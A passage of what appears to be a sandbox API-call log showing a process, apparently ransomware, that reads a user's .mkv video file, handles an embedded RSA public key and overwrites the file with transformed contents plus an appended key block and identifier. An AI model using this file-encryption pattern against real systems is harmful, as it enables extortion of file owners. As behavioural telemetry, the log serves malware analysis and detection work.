nFileSizeLow=0x17319, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tb8PI4n8ykiF82PGQ8M.mkv", cAlternateFileName="TB8PI4~1.MKV")) returned 1 [0202.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.602] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Tb8PI4n8ykiF82PGQ8M.mkv") returned=".mkv" [0202.602] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Tb8PI4n8ykiF82PGQ8M.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\tb8pi4n8ykif82pgq8m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.602] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=95001) returned 1 [0202.602] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.606] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x172f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.606] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.609] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.609] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17319, lpOverlapped=0x0) returned 1 [0202.610] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.610] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.610] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.610] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.612] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.612] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.612] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.612] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.612] GetLastError () returned 0x0 [0202.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.612] GetLastError () returned 0x0 [0202.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.613] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.613] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.613] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.613] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.613] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17320) returned 0x2ea99b0 [0202.614] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1be8 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1c30 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.615] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3698 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.618] GetCurrentThreadId () returned 0x66c [0202.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea94c8 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.619] GetCurrentThreadId () returned 0x66c [0202.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0202.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c30 | out: hHeap=0x620000) returned 1 [0202.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.631] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x17314, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x17314, lpOverlapped=0x0) returned 1 [0202.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.633] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x17319, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.633] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.635] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.635] 